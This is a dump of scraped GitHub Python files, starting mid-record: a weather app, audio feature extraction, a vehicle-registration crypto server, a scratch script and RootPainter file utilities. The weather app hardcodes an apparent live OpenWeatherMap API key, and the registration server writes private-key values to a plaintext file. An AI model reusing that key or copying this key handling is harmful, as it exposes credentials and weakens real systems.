\"Kyoto,jp\",\n]\n\n\n# function that gets the city info from openweathermap.org\ndef get_city_info(city):\n searched_city = city.replace(\" \", \"%20\")\n original_url = f\"https://api.openweathermap.org/geo/1.0/direct?q={searched_city}&limit=5&appid=e66bdef54de4e4b80c94c1571cac6d4c\"\n url = original_url.replace(\"{searched_city}\", city)\n response = requests.get(url)\n data_array = []\n\n if response.status_code == 200:\n data = response.json()\n data_array.append(data)\n for i in data_array:\n city_data = i[0]\n short_city_data = {\n \"name\": city_data[\"name\"],\n \"lat\": city_data[\"lat\"],\n \"lon\": city_data[\"lon\"],\n \"country\": city_data[\"country\"],\n }\n get_weather_data(\n short_city_data[\"lat\"], short_city_data[\"lon\"], short_city_data[\"name\"]\n )\n else:\n print(\"Error: \", response.status_code)\n\n\n# end of get_city_info\n\n\n# gets the weather info for any given city\ndef get_weather_data(lat, lon, city):\n weather_url = f\"https://api.openweathermap.org//data/2.5/weather?lat={lat}&lon={lon}&units=metric&appid=e66bdef54de4e4b80c94c1571cac6d4c\"\n response = requests.get(weather_url)\n\n weather_data_array = []\n if response.status_code == 200:\n data = response.json()\n weather_data_array.append(data)\n\n for weather_city_data in weather_data_array:\n short_weather_data = {\n \"name\": city,\n \"temp\": weather_city_data[\"main\"][\"temp\"],\n \"humidity\": weather_city_data[\"main\"][\"humidity\"],\n \"description\": weather_city_data[\"weather\"][0][\"description\"],\n }\n print(\n f'City: {short_weather_data[\"name\"]}\\nTemperature: {short_weather_data[\"temp\"]} C\\nHumidity: {short_weather_data[\"humidity\"]} %\\nThe weather in {short_weather_data[\"name\"]} is {short_weather_data[\"description\"]}.\\n'\n )\n\n\n# choose either 5 random cities or one selected by user\nusr_choice = input(\n \"Do you want to choose the city?(y/n) If no, then weather information for 5 random cities will be generated.\"\n)\nacceptable_answers = [\"y\", \"n\", \"yes\", \"no\"]\n\nif usr_choice.lower() not in acceptable_answers:\n usr_choice = input(\"Please enter a valid response - y/n\")\nshould_generate_cities = False\nif \"y\" in usr_choice.lower():\n usr_city = input(\n \"Please enter a valid city name and country code, separated by coma, no spaces {city_name,st}: \"\n )\n res = get_city_info(usr_city)\nelse:\n should_generate_cities = True\n rand_cities = []\n rand_cities_weather_data = []\n while len(rand_cities) < 5:\n random_num = random.randint(1, len(cities))\n if not cities[random_num] in rand_cities:\n rand_cities.append(cities[random_num])\n for rand_city in rand_cities:\n get_city_info(rand_city)\n# end of logic for user choice\n","repo_name":"rmitusis/Weather-App","sub_path":"Task 1 - Console Weather App/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10746506814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 11 21:07:37 2021\n\n@author: Yashi\n\"\"\"\n\nimport librosa\nimport numpy as np\nimport scipy\nimport csv\n\n#function to calculate statistical features\n\ndef describe_freq(freqs):\n mean = np.mean(freqs)\n std = np.std(freqs) \n maxv = np.amax(freqs) \n minv = np.amin(freqs) \n median = np.median(freqs)\n skew = scipy.stats.skew(freqs)\n kurt = scipy.stats.kurtosis(freqs)\n q1 = np.quantile(freqs, 0.25)\n q3 = np.quantile(freqs, 0.75)\n mode = scipy.stats.mode(freqs)[0][0]\n iqr = scipy.stats.iqr(freqs)\n \n d = dict();\n d['mean'] = mean\n d['sd'] = std\n d['maxv'] = maxv\n d['minv'] = minv\n d['median'] = median\n d['skew'] = skew\n d['kurtosis'] = kurt\n d['q1'] = q1\n d['q3'] = q3\n d['mode'] = mode\n d['iqr'] = iqr\n \n \n \n return d\n#END OF FUNCTION \n\npath = 'E:/Major Project/operation for one file/sen.wav'\nx , sr = librosa.load(path)\nfreqs = np.fft.fftfreq(x.size)\nresult = describe_freq(freqs)\n\n#creating an excel sheet\n\nheader = ['mean','sd','maxv','minv','median','skew','kurtosis','q1','q3','mode','iqr']\nfile = open('data.csv', 'w', newline ='')\nwith file: \n writer = csv.DictWriter(file, fieldnames = header) \n writer.writeheader() \n writer.writerow(result)\n","repo_name":"gyashi529/Gender-and-Age-recognition-using-ANN","sub_path":"Feature extraction for one file/onefile.py","file_name":"onefile.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"36994044628","text":"import time\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import ec\nfrom cryptography.hazmat.primitives import serialization\nimport string\nimport secrets\nimport socket\nfrom struct import pack, unpack\nfrom base64 import b16encode, b16decode\nimport threading\n\n\nDELTA_T = 1\n\n\ndef generate_random_alphanumeric_string(length: int) -> str:\n \"\"\"\n Generate a random password with at least one lowercase letter,\n one uppercase letter, and one digit.\n \"\"\"\n\n alphabet = string.ascii_letters + string.digits\n \n while True:\n password = ''.join(secrets.choice(alphabet) for i in range(length))\n if (any(c.islower() for c in password)\n and any(c.isupper() for c in password)\n and any(c.isdigit() for c in password)):\n return password\n \n\ndef bytes_XOR(byte1: bytes, byte2: bytes) -> bytes:\n \"\"\"\n Calculate the XOR of two byte strings.\n \"\"\"\n length = max(len(byte1), len(byte2))\n\n int_var = int.from_bytes(byte1, byteorder = 'big')\n int_key = int.from_bytes(byte2, byteorder = 'big')\n int_enc = int_var ^ int_key\n return int_enc.to_bytes(length, byteorder = 'big')\n\n\n'''\nUtility function to send byte stream data with length to the socket. \nSends the length first by packing it into a 4 byte integer.\n'''\ndef send_data_with_length(data: bytes, socket: socket.socket):\n length = len(data)\n socket.sendall(pack('>I', length))\n socket.sendall(data)\n\n'''\nUtility function to receive bytes data from the TCP stream. \nData is accompanied by its length first.\n'''\ndef recv_data_with_length(s: socket.socket) -> bytes:\n data_len = s.recv(4)\n data_len = unpack('>I', data_len)[0]\n data = s.recv(data_len)\n return data\n \n \n\ndef register_vehicles(conn: socket.socket):\n # Public and private key computation\n RCvi = int(input(\"Enter RCvi: \"))\n IDvi = generate_random_alphanumeric_string(10)\n\n RN = secrets.randbits(128)\n\n hash = hashes.Hash(hashes.SHA256())\n hash.update(IDvi.encode())\n hash.update(bin(RN)[2:].encode())\n private_key_number = hash.finalize()\n private_key_number = int.from_bytes(private_key_number, byteorder = 'big')\n private_key = ec.derive_private_key(private_key_number, ec.SECP256K1())\n\n public_key = private_key.public_key()\n public_key_bytes = public_key.public_bytes(\n encoding = serialization.Encoding.PEM,\n format = serialization.PublicFormat.SubjectPublicKeyInfo\n )\n\n private_key_bytes = private_key.private_bytes(\n encoding = serialization.Encoding.PEM,\n format = serialization.PrivateFormat.PKCS8,\n encryption_algorithm = serialization.NoEncryption()\n )\n\n # Calculation of Avi\n hash = hashes.Hash(hashes.SHA256())\n hash.update(bin(RCvi)[2:].encode())\n Avi = bytes_XOR(hash.finalize(), IDvi.encode())\n\n # Calculation of IDV*\n hash = hashes.Hash(hashes.SHA256())\n hash.update(IDvi.encode())\n hash.update(bin(RCvi)[2:].encode())\n ctime = int(time.time())\n hash.update(str(ctime).encode())\n IDV_star = hash.finalize()\n\n # Sending data\n send_data_with_length(Avi, conn)\n send_data_with_length(public_key_bytes, conn)\n send_data_with_length(IDV_star, conn)\n send_data_with_length(str(ctime).encode(), conn)\n\n\n # Receving data\n response = recv_data_with_length(conn).decode()\n if response == 'TIMEOUT ERROR':\n print('Timeout error')\n conn.close()\n return\n\n if response != '200 OK':\n print('Error in registration. IDvi* does not match.')\n conn.close()\n return\n\n B = recv_data_with_length(conn)\n D = recv_data_with_length(conn)\n BC = recv_data_with_length(conn) \n rtime = int(recv_data_with_length(conn).decode())\n\n ctime = int(time.time())\n\n if ctime - rtime > DELTA_T:\n print('Timeout error')\n send_data_with_length(b'TIMEOUT ERROR', conn)\n conn.close()\n return\n \n # Calculation of AID\n hash = hashes.Hash(hashes.SHA256())\n hash.update(IDvi.encode())\n hash.update(B)\n AID = hash.finalize()\n\n # Calculation of C\n hash = hashes.Hash(hashes.SHA256())\n hash.update(AID)\n hash.update(bin(RCvi)[2:].encode())\n hash.update(str(rtime).encode())\n C = bytes_XOR(hash.finalize(), D)\n\n # Calcuation of BC\n hash = hashes.Hash(hashes.SHA256())\n hash.update(B)\n hash.update(C)\n hash.update(AID)\n hash.update(str(rtime).encode())\n BC_star = hash.finalize()\n\n\n if BC_star != BC:\n print('Error in registration. BC does not match.')\n send_data_with_length(b\"BC ERROR\", conn)\n conn.close()\n return\n else:\n send_data_with_length(b\"200 OK\", conn)\n \n with open(\"TA_private.pem\", \"rb\") as f:\n TA_private_key = f.read()\n \n hash = hashes.Hash(hashes.SHA256())\n hash.update(private_key_bytes)\n hash.update(TA_private_key)\n E = bytes_XOR(hash.finalize(), C)\n E = bytes_XOR(E, B)\n\n # KeyRV\n hash = hashes.Hash(hashes.SHA256())\n hash.update(bytes_XOR(public_key_bytes, C))\n KeyRV = hash.finalize()\n\n # F\n hash1 = hashes.Hash(hashes.SHA256())\n hash1.update(private_key_bytes)\n hash1.update(TA_private_key)\n\n hash2 = hashes.Hash(hashes.SHA256())\n hash2.update(IDvi.encode())\n hash2.update(C)\n F = bytes_XOR(hash1.finalize(), hash2.finalize())\n\n with open(\"Vehicle_Users.txt\", \"a\") as f:\n f.write(IDvi + \",\" + b16encode(AID).decode() + \",\" + str(private_key_number) + \",\" + b16encode(KeyRV).decode() + \"\\n\")\n\n conn.close()\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('localhost', 7080))\n print(\"Connected to OBU\")\n \n send_data_with_length(B, s)\n send_data_with_length(E, s)\n send_data_with_length(F, s)\n send_data_with_length(public_key_bytes, s)\n s.close()\n\n print(\"Registration Successful\")\n\n\ndef register_RSU(conn: socket.socket):\n\n with open(\"TA_ID.txt\", \"r\") as f:\n TA_ID = f.read()\n\n send_data_with_length(TA_ID.encode(), conn)\n\n with open(\"Vehicle_Users.txt\", \"r\") as f:\n data = f.read()\n\n send_data_with_length(data.encode(), conn)\n conn.close()\n\n\n\n\n\ndef handle_client(conn: socket.socket):\n\n response = recv_data_with_length(conn).decode()\n\n if response == 'VU':\n register_vehicles(conn)\n elif response == 'RSU':\n register_RSU(conn)\n # elif response == 'PSO':\n # register_PSO(conn) \n\n\ndef main():\n \n # Creating TA server\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind(('127.0.0.1', 7070))\n s.listen(1)\n\n f = open(\"Vehicle_Users.txt\", \"w\")\n f.write(\"ID,AID,TPR,KeyRV\\n\")\n f.close()\n\n # [t.start() for t in thread_list]\n # [t.join() for t in thread_list]\n # Accepting connection\n try:\n while True:\n\n # Wait for a connection\n newsocket, fromaddr = s.accept()\n t1 = threading.Thread(target= handle_client, args=(newsocket, ))\n t1.setDaemon(True)\n t1.start()\n finally:\n newsocket.close()\n s.close()\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"vivmat08/SAMPARK","sub_path":"TA/TA_RegPhase.py","file_name":"TA_RegPhase.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10167320273","text":"# hibobi 项目\na=[1,2,4,2,4,5,6,5,7,8,9,0]\nb={}\nb=b.fromkeys(a)\nc=list(b.keys())\nprint(c)\nprint(dir(b))\nwith open(\"/Users/xiaotaozi/Downloads/ces\")as f:\n print(f.read())\n \n\n","repo_name":"NamedWu/intertest","sub_path":"hibobi/testcase/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5267539079","text":"import os\nfrom os.path import splitext\nimport filecmp\nimport numpy as np\nfrom skimage.io import imread\n\ndef ls(dir_path):\n # Don't show hidden files\n # These can happen due to issues like file system \n # synchonisation technology. RootPainter doesn't use them anywhere\n fnames = os.listdir(dir_path)\n fnames = [f for f in fnames if f[0] != '.']\n return fnames\n\ndef last_fname_with_annotations(fnames, train_annot_dir, val_annot_dir):\n \"\"\"\n Go through fnames and return the one after\n the last in the list with an annotation.\n If no annotations are found return None.\n \"\"\"\n last_fname = None\n val_annot_fnames = os.listdir(str(val_annot_dir))\n train_annot_fnames = os.listdir(str(train_annot_dir))\n annot_fnames = val_annot_fnames + train_annot_fnames\n\n # remove the extensions as annotations will always be PNG\n # but fnames could be JPG or other.\n annot_fnames = [os.path.splitext(f)[0] for f in annot_fnames]\n\n for i, fname in enumerate(fnames):\n if os.path.splitext(fname)[0] in annot_fnames:\n if i+1 < len(fnames):\n last_fname = fnames[i+1]\n else:\n return fnames[0]\n return last_fname\n\n\ndef get_annot_path(fname, train_dir, val_dir):\n \"\"\"\n return path to annot if it is found in\n train or val annot dirs.\n Otherwise return None\n \"\"\"\n train_path = os.path.join(train_dir, fname)\n val_path = os.path.join(val_dir, fname)\n if os.path.isfile(train_path):\n return train_path\n if os.path.isfile(val_path):\n return val_path\n return None\n\n\ndef get_new_annot_target_dir(train_annot_dir, val_annot_dir):\n \"\"\" Should we add new annotations to train or validation data? \"\"\"\n train_annots = os.listdir(train_annot_dir)\n val_annots = os.listdir(val_annot_dir)\n train_annots = [f for f in train_annots if splitext(f)[1] == '.png']\n val_annots = [f for f in val_annots if splitext(f)[1] == '.png']\n num_train_annots = len(train_annots)\n num_val_annots = len(val_annots)\n # first aim to get at least one annotation in train and validation.\n if num_train_annots == 0 and num_val_annots > 0:\n return train_annot_dir\n if num_train_annots > 0 and num_val_annots == 0:\n return val_annot_dir\n # then only add files to validation if there is at least 5x in train\n if num_train_annots >= (num_val_annots * 5):\n return val_annot_dir\n return train_annot_dir\n\n\n#pylint: disable=R0913 # Too many arguments\ndef maybe_save_annotation(proj_location, annot_pixmap, annot_path, png_fname,\n train_annot_dir, val_annot_dir):\n # First save to project folder as temp file.\n temp_out = os.path.join(proj_location, 'temp_annot.png')\n annot_pixmap.save(temp_out, 'PNG')\n\n # if there is an existing annotation.\n if annot_path:\n # and the annot we are saving is different.\n if not filecmp.cmp(temp_out, annot_path):\n # Then we must over-write the previously saved annoation.\n # The user is performing an edit, possibly correcting an error.\n annot_pixmap.save(annot_path, 'PNG')\n else:\n # if there is not an existing annotation\n # and the annotation has some content\n if np.sum(imread(temp_out)):\n # then find the best place to put it based on current counts.\n annot_dir = get_new_annot_target_dir(train_annot_dir, val_annot_dir)\n annot_path = os.path.join(annot_dir, png_fname)\n annot_pixmap.save(annot_path, 'PNG')\n else:\n # if the annotation did not have content.\n # and there was not an existing annotation\n # then don't save anything, this data is useless for\n # training.\n print('not saving as annotation empty')\n\n # clean up the temp file\n while os.path.isfile(temp_out):\n try:\n # Added try catch because this error happened (very rarely)\n # PermissionError: [WinError 32]\n # The process cannot access the file becausegc\n # it is being used by another process\n os.remove(temp_out)\n except Exception as e:\n print('Caught exception when trying to detele temp annot', e)\n return annot_path\n","repo_name":"Abe404/root_painter","sub_path":"painter/src/main/python/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"96"}